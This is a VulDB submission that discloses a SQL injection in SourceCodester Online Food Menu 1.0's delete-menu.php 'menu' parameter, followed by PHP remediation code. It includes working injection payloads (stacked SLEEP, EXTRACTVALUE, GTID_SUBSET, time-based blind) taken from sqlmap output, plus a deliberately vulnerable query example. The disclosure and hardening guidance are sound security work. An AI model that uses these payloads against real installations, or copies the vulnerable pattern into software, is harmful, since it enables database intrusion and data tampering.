| Field | Value |
|---|---|
| Title | SourceCodester Online Food Menu 1.0 SQL Injection |
| User | Delvy (UID 74555) |
| Submission | 09/06/2024 04:30 (1 year ago) |
| Moderation | 09/06/2024 23:30 (19 hours later) |
| Status | Accepted |
| VulDB Entry | 276779 [SourceCodester Online Food Menu 1.0 delete-menu.php menu SQL Injection] |
| Points | 17 |

Description:

Dear VulDB,

I hope this message finds you well. I would like to report a SQL injection vulnerability I discovered in SourceCodester's Online Food Menu Using PHP and MySQL with Source Code during my testing.

Details:
Affected URL/Endpoint: /food-menu/endpoint/delete-menu.php
Vulnerable Parameter: menu
Risk Level: High (allows malicious users to execute arbitrary SQL queries)

Steps to reproduce:
1) Navigate to the Admin area page.
2) Use a proxy like Burp Suite to intercept the "delete-menu" request.
3) Input the payload "/food-menu/endpoint/delete-menu.php?menu=4';SELECT+SLEEP(7)%23" to invoke the SQL injection.
4) The menu parameter is also vulnerable to the following attacks, as reported by sqlmap:

```
Parameter: menu (GET)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: menu=4' AND EXTRACTVALUE(8269,CASE WHEN (8269=8269) THEN 8269 ELSE 0x3A END)-- jhtJ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: menu=4' AND GTID_SUBSET(CONCAT(0x71627a6a71,(SELECT (ELT(1777=1777,1))),0x716b6a7071),1777)-- uuXb

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: menu=4';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: menu=4' AND (SELECT 7516 FROM (SELECT(SLEEP(5)))ythw)-- AVNZ
```

Please let me know if you need further information or a more detailed analysis.

Best regards,
[Your Name]
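The report above describes the classic pattern behind this finding: a GET parameter concatenated straight into a DELETE statement, with the database connection accepting stacked statements, so `4';SELECT SLEEP(7)#` closes the quoted value, terminates the DELETE and runs a second query. The following is an added illustration written for this page, not the SourceCodester project's own `delete-menu.php`; the table name `menu_list`, the column `id`, the PDO connection details and the function names are assumptions. It shows the vulnerable shape next to a hardened version that validates the parameter as an integer, binds it, and turns off multi-statement support so a stacked payload is rejected even if some other query is later written carelessly.

```php
<?php
// Added example, not the project's code. Table/column names and the
// PDO DSN/credentials are assumptions made for illustration.

// Vulnerable pattern (hypothetical reconstruction of the reported flaw):
// the raw GET value is interpolated into the statement. PDO's MySQL
// driver accepts multiple statements per call by default, so
// menu=4';SELECT SLEEP(7)# becomes
//   DELETE FROM menu_list WHERE id = '4';SELECT SLEEP(7)#'
// and the second statement is executed too. EXTRACTVALUE/GTID_SUBSET
// error-based payloads work whenever the DB error text reaches the client.
function deleteMenuVulnerable(PDO $pdo, array $get): int
{
    $menu = $get['menu'] ?? '';
    return (int) $pdo->exec("DELETE FROM menu_list WHERE id = '$menu'");
}

// Hardened version: type-validate, parameterise, never echo DB errors.
function deleteMenuSafe(PDO $pdo, array $get): int
{
    // id is numeric, so anything that is not a positive integer is refused
    // before it ever reaches the database.
    $menu = filter_var(
        $get['menu'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($menu === false) {
        http_response_code(400);
        return 0;
    }

    // Server-side prepared statement: the value is sent separately from the
    // SQL text, so quotes, comments and semicolons in it are just data.
    $stmt = $pdo->prepare('DELETE FROM menu_list WHERE id = :id');
    $stmt->bindValue(':id', $menu, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Connection options that close off the stacked-query and error-based
// vectors at the driver level (defence in depth; the fix is the binding).
$pdo = new PDO(
    'mysql:host=localhost;dbname=food_menu;charset=utf8mb4', // assumed DSN
    'app_user',                                              // assumed
    'app_password',                                          // assumed
    [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION, // catch, log, do not display
        PDO::ATTR_EMULATE_PREPARES   => false,  // real server-side prepares
        PDO::MYSQL_ATTR_MULTI_STATEMENTS => false, // "...; SELECT SLEEP(7)" is refused
    ]
);

try {
    // Only the hardened handler should be reachable from the endpoint;
    // an authenticated admin session check belongs before this call.
    $deleted = deleteMenuSafe($pdo, $_GET);
    header('Content-Type: application/json');
    echo json_encode(['deleted' => $deleted]);
} catch (PDOException $e) {
    error_log($e->getMessage());   // log server-side
    http_response_code(500);       // generic response, no SQL error text
}
```

With `MYSQL_ATTR_MULTI_STATEMENTS` off, the `SLEEP(7)` stacked payload from step 3 fails at the driver rather than costing seven seconds per request; with errors logged instead of rendered, the EXTRACTVALUE and GTID_SUBSET error-based payloads have no channel back to the attacker. The integer validation plus parameter binding is what actually removes the injection; the two connection options only limit the blast radius of any query the binding does not cover.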